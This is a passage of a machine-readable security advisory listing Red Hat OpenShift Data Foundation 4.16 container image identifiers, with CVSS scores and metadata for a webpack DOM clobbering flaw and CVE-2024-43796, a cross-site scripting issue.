"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-43796", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:28.106254+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", 